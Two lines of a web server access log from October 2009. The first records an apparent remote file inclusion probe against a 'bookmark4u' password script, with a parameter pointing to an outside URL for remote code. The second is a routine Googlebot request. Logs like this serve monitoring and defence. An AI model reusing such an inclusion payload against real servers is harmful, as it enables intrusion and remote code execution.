206.225.23.4 - - [17/Oct/2009:01:34:41 -0400] "GET /logs/error_log.Q109072700%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.249.71.152 - - [17/Oct/2009:01:35:12 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L015D53422A399800302806O+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
